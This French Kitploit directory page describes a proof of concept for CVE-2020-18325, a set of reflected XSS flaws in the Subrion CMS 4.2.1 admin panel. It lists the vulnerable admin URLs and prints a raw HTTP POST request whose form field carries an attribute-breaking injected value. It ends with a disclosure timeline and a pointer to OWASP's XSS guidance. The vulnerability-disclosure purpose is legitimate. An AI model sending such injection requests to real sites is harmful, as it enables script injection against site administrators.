Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-18325 — Exploit PoC pour CVE-2020-18325 | Kitploit
Outils/GitHubGitHub/hamm0nz/cve-2020-18325
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Exploit PoC pour CVE-2020-18325

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Plusieurs vulnérabilités de type Cross-Site Scripting (XSS) existent dans le panneau de configuration de Subrion CMS v4.2.1 d'Intelliants.

Description

Subrion CMS est facile à installer et simple à gérer. Utilisez-le comme application autonome ou en conjonction avec d'autres applications pour créer des sites d'entrée de gamme, des sites de taille moyenne ou des grands sites.

Plusieurs vulnérabilités de type Cross-Site Scripting réfléchi (Reflected XSS) ont été découvertes dans le panneau de configuration de Subrion CMS v.4.2.1, permettant à un attaquant distant d'injecter du JavaScript arbitraire.

Date: 27-02-2022
Lien du logiciel: https://subrion.org
Auteur de l'exploit: HaMM0nz
CVE: CVE-2020-18325
Catégorie: Application Web
URL affectées

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

Preuve de concept

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1

-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

Chronologie

Découverte et signalement : 24 juin 2019
Attribution de l'identifiant CVE : 11 août 2021
Publication : 27 février 2022

Solution

Envisagez de vous conformer aux directives de prévention des XSS de l'OWASP. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

Télécharger l’outil